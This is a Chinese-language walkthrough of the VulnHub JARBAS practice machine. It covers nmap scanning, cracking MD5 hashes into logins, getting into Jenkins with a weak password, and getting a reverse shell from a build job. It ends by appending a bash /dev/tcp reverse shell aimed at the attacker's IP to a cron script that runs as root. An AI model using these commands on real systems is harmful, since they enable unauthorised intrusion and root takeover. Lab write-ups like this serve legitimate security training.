[Vulhub靶机]JARBAS靶机渗透

[Vulhub靶机]JARBAS靶机渗透

靶机搭建

下载地址:

https://download.vulnhub.com/jarbas/Jarbas.zip

下载后设置nat模式即可与攻击机同一网段

kali:192.168.88.133

1.信息收集

主机发现

首先对C段进行扫描,发现131这台主机

sudo nmap -sn 192.168.88.0/24

端口扫描

接下来对这台主机的端口进行4次扫描，第一次快速的tcp扫描，第二次常见端口的udp扫描，第三次详细的tcp扫描（针对已经探测出来的端口），第四次启用nmap自带的漏扫进行扫描（也是探测出来的端口）

TCP快速扫描
sudo nmap -sT --min-rate=10000 -p- 192.168.88.131 -oA vulhub/JarBas/nmapports1-p- 扫描全端口
--min-rate=10000 设置最小的扫描速率

UDP扫描
sudo nmap -sU --top-port 20 192.168.88.131 -oA vulhub/JarBas/udp-ports1--top-port 常见20个端口

接下来把TCP端口的信息整合在变量上，下两次扫描命令更好写

TCP详细扫描探测出的端口信息

sudo nmap -sT -sV -sC -O -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/details1

使用漏洞脚本扫描

sudo nmap --script=vuln -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/vuln1

2.漏洞探测发现

Mysql渗透

查看了一下未授权，无果就直接放弃了

sudo mysql -h 192.168.88.131 -u root -p 

Web渗透

查看后是默认的页面。

使用dirsearch扫一下目录

dirsearch -u 192.168.88.131

查看/access.html

写着凭证以安全的方式进行了加密，尝试使用hash-identifier识别一下这个密文

识别大概率是md5

成功解密，对应密文如下 第一反应是ssh登录，mysql登录,但是都没有成功

tiago:italia99
trindade:marianna
eder:vipsu

接着访问到了8080端口，为一套很常见的cms-Jenkins。那先尝试一下nmap扫的robots.txt以及刚刚找到的这三个用户和弱口令尝试

发现第三个用户eder成功登录

那随机去搜索一下Jenkins的漏洞

创建项目，然后执行shell命令，写入反弹shell，kali开启监听。

点击Build_Now 执行刚刚创建的项目，成功反弹。但是权限很低。很多命令无法执行

jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

查看定时任务

cat /etc/crontab 

发现每五分钟会以root权限执行如下脚本

查看到有写入的权限，将反弹shell写入sh脚本中 kali开启监听

echo "/bin/bash -i >& /dev/tcp/192.168.88.133/4443 0>&1" >> /etc/script/CleaningScript.sh
nc -lvvp 4443

成功拿到root权限